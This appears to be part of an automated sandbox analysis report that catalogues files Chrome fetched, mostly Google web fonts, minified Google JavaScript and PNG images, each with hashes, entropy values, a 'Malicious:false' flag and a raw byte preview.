                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 61920, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):61920
                                                                                                                                                                                                                                        Entropy (8bit):7.996214409443772
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:HuomhDq6KdXr6849M/Q6pRI+VR5alROriQ+UW+H78PyYu:Oo2qlX28R/Q6pRbw/grrJ76yYu
                                                                                                                                                                                                                                        MD5:88EECBB07B31C1C84F72DBCD0222301C
                                                                                                                                                                                                                                        SHA1:A32191D3E1B6722239CF82EAF6C34038C18BBB32
                                                                                                                                                                                                                                        SHA-256:E22CEFA6ED9BECBFD822D92B5E31D4DD1880B8DFB81441FB703D0FBE3E5C312D
                                                                                                                                                                                                                                        SHA-512:5864F250FC6B89C0DB008F9AC6C6EF4626DBCCBB72F36998C27C8386191FFEBD6624DE5587913ABE064F3995F270C9370C9DB0EEE6989FE2DE217F22C6717A57
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Ew7.woff2
                                                                                                                                                                                                                                        Preview:wOF2..................t..............................x..B.`?STATH..l.|...........\..p..6.$..\. ..Z..y..([.....ct...........*....r..c;.B..qx.....{.=ma.\oV5.p.........M.C...n...6.D.R+... M..-&..9.....0F.FLp13c.....o.e^/.H=.......a..h.z...c..-.j.+Lua&,..,...i..f.F....Z..7[.qD...TI.TI}V...6.@...*....d.......Ms.+..H7k9'.RD.....-"i..?.?>et..........=..i..wG....;...(.....?.AF....#\c...W.......2...Y..1.....]..K.jdw.d....S.....4P..6P.a......`.a/.....c..~...7b|..32..Z...S.L..*..&.o...&....@R.p$e....GCO...:;......:..H.T...)..../a.a..\.]...Q.k..BT;........L...2..-...A..Dul.=...U].1.Z.#.x.>.....W.+...e.^.(.%...,$J...FEQl....#.T<....8...]*j...kv....D.. ...8..9<Ax...y....?.c..'r"......a..[.D......_D>w.....Rb..X...+6...l.Q!U......qzV...g..'V_.....+!.s../..u~....IH ?c..1.E.0.I_............v.:.aj}.SEu..w.{.'1.<HB..!v..8.@.n~a.x..LH0m*..)..Z.e.}.......S...k..9\.(W2.....E..q...:._..._.../....._-T%+....!......B.8|B..E|......i..R.*!5bK.QO-+fX..}...e..E..I.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1120)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):208226
                                                                                                                                                                                                                                        Entropy (8bit):5.5259538137819915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:pK/Vc8GlWWhNiEmnGTOXwqLXZT6uCnL5EQZpyuSTsO9qi0pMRwa/lLPPBmXf:pGc8aKB7ZT6KiSTsO9j79LPPBmXf
                                                                                                                                                                                                                                        MD5:85C605284CA07CABD2C47F811436A39C
                                                                                                                                                                                                                                        SHA1:EF502DB811F14EE3734B0A374E20ACD5F8144529
                                                                                                                                                                                                                                        SHA-256:D2D6FB9D2621B39CD53FE8459C144246E89D76EBE8211A72C7877AAB3F88B03F
                                                                                                                                                                                                                                        SHA-512:E31E02ADDD48BEED8FA5EBC94DE8047D4BE28409B43BC2F7A369F0B2BB5B851CB69730AD3929E23F46546974DE15C0C1217BAC35F5C4CAA0DB36ED4190BA465F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_1"
                                                                                                                                                                                                                                        Preview:gapi.loaded_1(function(_){var window=this;._.ug=(window.gapi||{}).load;._.Qn=_.ve(_.Ge,"rw",_.we());.var Rn=function(a,b){(a=_.Qn[a])&&a.state<b&&(a.state=b)};var Sn=function(a){a=(a=_.Qn[a])?a.oid:void 0;if(a){var b=_.re.getElementById(a);b&&b.parentNode.removeChild(b);delete _.Qn[a];Sn(a)}};_.Tn=function(a){a=a.container;typeof a==="string"&&(a=document.getElementById(a));return a};_.Un=function(a){var b=a.clientWidth;return"position:absolute;top:-10000px;width:"+(b?b+"px":a.style.width||"300px")+";margin:0px;border-style:none;"};._.Vn=function(a,b){var c={},d=a.xc(),e=b&&b.width,f=b&&b.height,h=b&&b.verticalAlign;h&&(c.verticalAlign=h);e||(e=d.width||a.width);f||(f=d.height||a.height);d.width=c.width=e;d.height=c.height=f;d=a.getIframeEl();e=a.getId();Rn(e,2);a:{e=a.getSiteEl();c=c||{};var k;if(_.Ge.oa&&(k=d.id)){f=(f=_.Qn[k])?f.state:void 0;if(f===1||f===4)break a;Sn(k)}(f=e.nextSibling)&&f.dataset&&f.dataset.gapistub&&(e.parentNode.removeChild(f),e.style.cssText="");f=c.width;h=c.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 37800, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):37800
                                                                                                                                                                                                                                        Entropy (8bit):7.993884030418155
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:SO2l7xREG7vwgbAhzZMu7I/5WqSdZxoIMfKLhDAm7Yl68:S9HRDI3Mu0UqkPMfKLhD97Yv
                                                                                                                                                                                                                                        MD5:2B097CB2DC262C764A2C97D4E233918D
                                                                                                                                                                                                                                        SHA1:83DB49B6B6DDA13ADC82726197CC2B243EF647DC
                                                                                                                                                                                                                                        SHA-256:7615AED2ED8F1361D3ABA2B6CE6612468463E660E8BD4A4302B24C113EC57308
                                                                                                                                                                                                                                        SHA-512:74193AA72286C60886138955917F87171F2FE483D6C2F35BB1CF1D17A0390F05149FF73EF7AC5550281A45CB0F9608D9C1BBB3AA5C3DA2843D21F61111601333
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotomono/v23/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_Of2PRg.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............7....L.........................4.`?STATD..`.....$.."..r..6.$..r. ..l........'pg..q;h...g.......E...U0.....x.}......Td.6...c......Q...j..M...e5EJ.V'..#%.Y..m....\..>.....S..k.$/.g$.gZn>..0..S..&\Y..A{.......t.......6....A.!.y.Y;.].~..........?G.'...u....U`...Q+NT.._/...}FrF:.'.+7.q_....%=...1....,...=:...A.....,@B.D..x.......7...~{.WA*d..VU.../.>.Rb..!B....tX.i$.,H...a.......)....b..z..>........y....1`.`...T.h4....\...b...fV....#O9.$...MCB.W.~Z..N^.6.5..<.x.u.X.....$U8.G`4N".'<Dp.wY...2=.kXK...0..........7.......M.....!p..@D..:v.:.-.o...)...a..8..l....<.\...x.gT..........m...0..8.A>..h...[0...0..8A.%r...{.......f.......L*..9....*p..........q.[^6..s.....[h.-.. ....#.E._..Z&.g......)....T7%,![........A.8...b......C...@....Z..9QK{.4.{4.T...o.....D.1ib..Y.9.=.}.3.T.h.b%B.f.&."-R2$.......R....+y...+OW....T.Jgy..(..F.2.}...F.)......^.T.....a.t..i.....g....."....R.J@.s.BU....,fvAp......H../../Q.;,...`..y....+&9.T.(C..sw.;We...nzwn.+.........q.`.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (958)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3340
                                                                                                                                                                                                                                        Entropy (8bit):5.572000833282149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:DEbfw/K2C/mcsLaSbfegrNAM+RyQ41sFCK02N+3vuVXxM8Vq9RF7VauMMGVcFZrE:qfwinm/bfegrNAVRytW4324gBfErVZVE
                                                                                                                                                                                                                                        MD5:4062B7A556AAADC4BC2500E44384A77E
                                                                                                                                                                                                                                        SHA1:572F12056CF698111FB4BD1E965CA0F2F31626E8
                                                                                                                                                                                                                                        SHA-256:B149B0AE8C48381D1635FDE5542B9CB77EFA326A8140A235CAEA2AE498EE2211
                                                                                                                                                                                                                                        SHA-512:97808C54B99F3EE4B855D5049C49CA6ACA2D4AF02889AE29903CB2EC1B8E172456541DE9DB2646BDDB7BDBFDAF18224DCA7E61FF178861CC236CF3F248160394
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://contacts.google.com/_/scs/social-static/_/js/k=boq.SocialPeopleHovercardUi.en_US.OTDGvqrbWkA.es5.O/ck=boq.SocialPeopleHovercardUi.am_eiS5DCJI.L.B1.O/am=AAzwBg/d=1/exm=A7fCU,BVgquf,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,P6sQOc,PrPYRd,QIhFr,RMhBfe,RyvaUb,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Xg7Hl,Z5uLle,ZDZcre,ZwDk9d,_b,_tp,aW3pY,byfTOb,e5qFLc,gychg,hKSk3e,hc6Ubd,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,zbML3c,zr1jrb/excm=_b,_tp,hovercardwidget/ed=1/wt=2/ujg=1/rs=AGLTcCMGAOB_dxffKDnVcDexqPgg1STFGg/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                        Preview:"use strict";this.default_SocialPeopleHovercardUi=this.default_SocialPeopleHovercardUi||{};(function(_){var window=this;.try{._.y("Wt6vjf");.var KA=function(a){this.qa=_.B(a,0,KA.qb)};_.J(KA,_.G);KA.prototype.Ua=function(){return _.N(this,1)};KA.prototype.Pb=function(a){return _.Tm(this,1,a)};KA.qb="f.bo";var LA=function(){_.Qp.call(this)};_.J(LA,_.Qp);LA.prototype.tb=function(){this.Dt=!1;MA(this);_.Qp.prototype.tb.call(this)};LA.prototype.H=function(){NA(this);if(this.xl)return OA(this),!1;if(!this.Ou)return PA(this),!0;this.dispatchEvent("p");if(!this.Cr)return PA(this),!0;this.kq?(this.dispatchEvent("r"),PA(this)):OA(this);return!1};.var QA=function(a){var b=new _.qv(a.bB);a.ss!=null&&_.yv(b,"authuser",a.ss);return b},OA=function(a){a.xl=!0;var b=QA(a),c="rt=r&f_uid="+_.yn(a.Cr);_.Cr(b,(0,_.fj)(a.N,a),"POST",c)};.LA.prototype.N=function(a){a=a.target;NA(this);if(_.Ir(a)){this.Yo=0;if(this.kq)this.xl=!1,this.dispatchEvent("r");else if(this.Ou)this.dispatchEvent("s");else{try{var b=_
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (880)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):164019
                                                                                                                                                                                                                                        Entropy (8bit):5.068564432958455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hwHCEN8CJKxfT2zikaZaPBbJMYLQQZTEvMxZgzgzXPXpe:hw3J0fTuaZaPBbJMPQZTEvMxZe8XPXpe
                                                                                                                                                                                                                                        MD5:24CE02F460E8C9293C1ED52A5575522D
                                                                                                                                                                                                                                        SHA1:267170340BB963756E8044D7C5C4E22888DFD1A3
                                                                                                                                                                                                                                        SHA-256:7707861D1414ED16F28D382E08592D990771F7461CD99C5CF411A0B544D1C8E5
                                                                                                                                                                                                                                        SHA-512:E8F7BFA30274CC9DE7BFDBE4F408729E4152FC39FFCF54162B4FE887DE0322C75A3E48FDA43113D6B2198704B1E343192D3CB2CBFE4EB4EDB52019B9F0D2B8B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/566411678-client_js_prod_datetimeresources.js
                                                                                                                                                                                                                                        Preview:mK(fta);.var mEu="\u17a2\u17b6\u1791\u17b7\u178f\u17d2\u1799",nEu="\u17a2\u1784\u17d2\u1782\u17b6\u179a",oEu="\u179c\u17b7\u1785\u17d2\u1786\u17b7\u1780\u17b6",pEu="\u1798\u17b7\u1790\u17bb\u1793\u17b6",qEu="\u1780\u17bb\u1798\u17d2\u1797\u17c8",rEu="\u1780\u1780\u17d2\u1780\u178a\u17b6",sEu="\u1021\u1004\u103a\u1039\u1002\u102b",tEu="\u101e\u1031\u102c\u1000\u103c\u102c",uEu="\u1017\u102f\u1012\u1039\u1013\u101f\u1030\u1038",vEu="\u1010\u1014\u1004\u103a\u1039\u101c\u102c",wEu="\u1010\u1014\u1004\u103a\u1039\u1002\u1014\u103d\u1031",.xEu="\u1000\u103c\u102c\u101e\u1015\u1010\u1031\u1038",yEu="\u0db6\u0dca\u200d\u0dbb\u0dc4\u0dc3\u0dca\u0db4\u0dad\u0dd2\u0db1\u0dca\u0daf\u0dcf",zEu="\u0d85\u0db4\u0dca\u200d\u0dbb\u0dda\u0dbd\u0dca",AEu="\u0cae\u0cbe\u0cb0\u0ccd\u0c9a\u0ccd",BEu="\u0c2e\u0c3e\u0c30\u0c4d\u0c1a\u0c3f",CEu="\u0a8f\u0aaa\u0acd\u0ab0\u0abf\u0ab2",DEu="\u09b8\u09c7\u09aa\u09cd\u099f\u09c7\u09ae\u09cd\u09ac\u09b0",EEu="\u09a6\u09cd\u09ac\u09bf\u09a4\u09c0\u09af\u09bc \u09a4\u
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):85980
                                                                                                                                                                                                                                        Entropy (8bit):7.986049743918973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:r+F56y2kfwlXiiYL35bSxu9JMK2/OWvyUKJ6gS81eeJ3KUzQwvlb01Rg5SGV0mdd:yFUgwpiis4GaPhKEXes1RdGd3fIGH
                                                                                                                                                                                                                                        MD5:7272BF51987738823752D5AA8C982271
                                                                                                                                                                                                                                        SHA1:4B19594A1BCE741C5E3A07696CBA4D05ECA45A03
                                                                                                                                                                                                                                        SHA-256:862E2D8B47621B79FB804926FD864B632E71237AE281F63F2009B02F1D4ECA15
                                                                                                                                                                                                                                        SHA-512:C3B15FD715D0B2E12786E09D761F7CC08641A137CBD3A7A98BC718B843C71AAFC73ED93B868C4006BB338C14741D2522902874BC349C5A44E02878D3D781E57D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..O.IDATx...1....../Y.DYX.%...(9.C.#.\.ne4.D.,0s.....!^......a....VZ..... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a.d#1..v.?.....dw..k......$......).......*....4...L...a........a...@X.......@X..... ,.a......Nc1...Y..,...{g..E.......] .....u....X....".......?.93S=..B..S.3.v!t...n]..N.H.0...X5.....5....Wn.~..q8...8...&-..........t..y........x_][[ZU.]Z.....V..zX.......H7.......:..G.....F.U;....K.C-M#m-.A.].22.Wh....../D...@O......L.r..h.e.................c.....I....6..*.....-....M1I..,...M..jQ8...{.....2.~.<d.....Rtqe..*.jj..p....h.fY7o.qi_{.....|u......9.....N]!......'S.?,.....s.5r..U.:...#`..2l.I.8.....:...CF1Y........,.V......I._.DC....p.........b...e..s..B..x9.vl.QO..'..UWg...d..o.. c...;.,....=q.....x....Y'.}=]MuH......<...=$q........m.=.....*jj..*.....l.M&Y>..hf....16..w...G..x..Yb...*kj..=I.t1.4..........29.`MT...Tj..B..Y.X...jki.....-...,....YwC.y9..S{..AQ.../Q=.}\F.9.P....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48238)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):48239
                                                                                                                                                                                                                                        Entropy (8bit):5.343270713163753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                                                                                                                                                                                        MD5:184E29DE57C67BC329C650F294847C16
                                                                                                                                                                                                                                        SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                                                                                                                                                                                        SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                                                                                                                                                                                        SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (530)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):317324
                                                                                                                                                                                                                                        Entropy (8bit):5.380891956424149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:9vTy/AhvO3gD5t3oY2E95vULuIvq/Gdok:9by/AFO3YdvUKIwO
                                                                                                                                                                                                                                        MD5:ABCF3344F7EE89C9E1C71B5C6FF0428F
                                                                                                                                                                                                                                        SHA1:E900BC071B82F5BF861C57EF1DBE2C12FB658BF5
                                                                                                                                                                                                                                        SHA-256:EBB92A69BBB7AD3619B6F6EE37EE5E01EE05F144D732DC4ED3CD99B63B9155A5
                                                                                                                                                                                                                                        SHA-512:9CD621B8E8C4621C7E71C483E39EF4CC3D6A9BCDE7C593A4A18E3CFD92A290DBC21C7F3400F9B426227F81B9E429218A878556A9AA30F88DFC02866216657E97
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/3256724347-client_js_prod_kix_nestedsketchycore.js
                                                                                                                                                                                                                                        Preview:mK(Q1a);.var Otf="#FFFFFF00",Ptf="%s already belongs to %s",Qtf="%s is not an allowed shape property for a MediaClip.",Rtf=", exitAnimation=",Stf="100",$L="11",aM="24",Ttf=":animation",Utf=":background",Vtf=":document",Wtf=":guide",bM="AM",Xtf="Document does not contain MediaClip with ID %s",Ytf="Illegal id: %s",Ztf="Invalid nesting level: %s",$tf="Not a shape: %s",auf="OBJECT_WITH_CAPTION_TEXT",buf="ONE_COLUMN_TEXT",cuf="PICTURE_WITH_CAPTION_TEXT",cM="PM",duf="SECTION_HEADER",euf="SECTION_TITLE_AND_DESCRIPTION",.fuf="SPLIT_TITLE_AND_BODY",guf="TITLE_AND_BODY",huf="TITLE_AND_TWO_COLUMNS",iuf="TWO_OBJECTS_WITH_TEXT",juf="Transform %s is not valid for object %s",kuf="VERTICAL_TITLE_AND_VERTICAL_TEXT",luf="bodyPlaceholderListEntity",muf="index %s is out of bounds",nuf="oB`",ouf="properties",puf="ro",quf="sketchy-addAnimation",ruf="sketchy-addEntity",suf="sketchy-addListEntity",tuf="sketchy-addMediaClip",uuf="sketchy-addPage",vuf="sketchy-animationProperies",wuf="sketchy-background",xuf="s
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 57236, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):57236
                                                                                                                                                                                                                                        Entropy (8bit):7.99608783144297
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:L3JWy0wublqOS8eUCwnd3nVvgx5iMYZsFFcnEzHcV12+1w:L5pAbllS8iwndXVvwUsFFUqHcV1f1w
                                                                                                                                                                                                                                        MD5:212D9F17F0F5D037532FA3B8FC14B8DE
                                                                                                                                                                                                                                        SHA1:C332A9F57F2C7931F2A930B5D91BCF244E38FC42
                                                                                                                                                                                                                                        SHA-256:53B183E10D8C5DB234637E82BEF4014117BD41C956C69AF55FA0165A7BE31666
                                                                                                                                                                                                                                        SHA-512:F36B776390830548F3B7931B223E94301D1711C41D8E9F0AE43A50EAF9B3D0B1FDC66708802E2C53F416A7DCFE8937EFAF1BA0CF15CF83E20C955AA3853D1710
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l52xwNpWg.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............P..............................t..^..T.`..(.....m.....`........6.$..|. ..Z.....1[....n;.U.p....JF+._.7.Sn..IA..o.l..n.,...p......d!r.}.>I.6PU..f$....);9.R.j.J..B.....PJ..!...u.|.'{/K.M.L)..h1.......g..k.9^3f.y.S..>].z.o."(......V}.?LE...EyF.Y.J..v.v..E..S...:..+.{......Rag.DOT.1._.....Up..V.V..5.W....xg.G......}.fH"!........'q.....{t...z}i).9.C)E.CR.;..5.......#.W..W[.l......A..D[..m.k.Y9y......U....W...?...o.{...(...$G.3D.c..s...6....;.:.msn..v..lv........{...4..-3.-....T.vJ....-W$...:<.$\.....{>{.u.....&qSq......"L.E4.u.......{^.>.iT..2.d...R...JX....j..X.{g..9...A0....q"C..G....W.e...vM!t.@.=Q......G....3...0.D....X.......pwQBa.HC..`wm.d............@.B v...@.$A.*.......*j.......n..uZ...n.^.+..K.o.@w.ap).a..!Q....4....f..Q.k.....1..P?.....a.....'>....5.<...... ../.....8...~.S...z...iT.\.k...;K......D~..K....P.7.?.....P..!.%P..Z....r...U{..'......2kDP.8.......L'..A...C....k.M.P.nJ........$'...bW...a..v.j.hv{+.?.;.._.L...A=b.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2412)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):214843
                                                                                                                                                                                                                                        Entropy (8bit):5.526586363143379
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5qq8srgb0hYTnZukAVa5OwOYCNwWlJ20IovucXBK28h8fFQP+nHmgLJcQ4zX+tee:5qqvrgb0hYTn5AVa5OwOYCNwWlJ20IoJ
                                                                                                                                                                                                                                        MD5:69C9B67FBDC3E9C35B6019A7833D71FC
                                                                                                                                                                                                                                        SHA1:B887F3FDA6C804FEBC784BA4254ECC1BF38EDF69
                                                                                                                                                                                                                                        SHA-256:696C29CC76CF7E0F505E3D610836BB555BCBBEC52031E4C5C09E14DBC8048514
                                                                                                                                                                                                                                        SHA-512:DB2372F3E022D8832277951825B4A85899A80FABA26D36AE218831B54518739366EF6B9495834C16A4BBD75FCE1576F2D8C777AAECBFA45A098F77BD84B311CE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.wd=typeof AsyncContext!=="undefined"&&typeof AsyncContext.Snapshot==="function"?a=>a&&AsyncContext.Snapshot.wrap(a):a=>a;.}catch(e){_._DumpException(e)}.try{._.pe=function(a){return _.Ib(a)&&a.nodeType==1};_.qe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.me(a),a.appendChild(_.ce(a).createTextNode(String(b)))};var re;_.se=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));const d="aria-"+b;c===""||c==void 0?(re||(re={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=re,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var we;_.ve=func
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5978
                                                                                                                                                                                                                                        Entropy (8bit):7.730317861211607
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:82hYnZY1EBEvrcZ3Wej4ehvFGHY5dhbMJaXizl+Q9I3h+jP+8YEMXq6nkfK44gmE:fh6ZBeKRVE45dhbMJciUQi3h+6lQ6kfR
                                                                                                                                                                                                                                        MD5:9B8740C1808C8F08D18B8741F892EBBB
                                                                                                                                                                                                                                        SHA1:0CFF5762132071687617A0C3BD395F9312F59623
                                                                                                                                                                                                                                        SHA-256:276AF50EFAF66D0E7CB4E61253E81BC62DF40A27DB4596EC948A02E634E1163B
                                                                                                                                                                                                                                        SHA-512:1E4A5EA612D8476031E49780D6EC2746A9F421AE4D08F1B499356B9A16E3BF68935BA158EF6FFF542C9CB2191AB7EA350CB776DD9EE2F05A739B339AEE254117
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...!IDATx......... .....h.'....O... ,.a........a...@X..... ,@X..... ,.a-.a........a...@X..... ,@X..... ,.a........a...@X..... ,@X..... ,.a............@X..... ,.a..... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a........a.<..@X..... ,@X..... ,.a............@X..... ,.a........a...@X........}s..#.........F.m.k.m..a?...M...=...?...k.|..l.....zY.t.X$.Wk..0..@.......J..Z}"U.8.nhA........f.1.).H(.......q.^6.3.l.^.....t... X...K..[4}\...Z....o^..A......d1_h...r../.r..&.TJ.z.6..J._.|.W....51).a:X..K.'...z....O...0.,d4.P.BX..h5...e......(..^g......:...Z.JF...+.a:X..[4...[......Z(a....L....L.A.....?.zU......h..6. X......y|pB.2...&......f...`).j8....KF.vzX..`.X$.a...y.'.....h....L.`a!.a..}pB..^.KFs..... X`.......M8......L.i..L.A...+.>.z.L.....j.*.B., ..>.........._..b...."1.u!X..p..,._.#..e...8..WJ.6.q.f.Pt9=7.......>n6Y........Y...A.I..afffffffff.Dt......*.Oi...R........=g.b.o.{w.S=..C..m..4h.S.(^y....=.kG.....r.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 62168, version 1.0
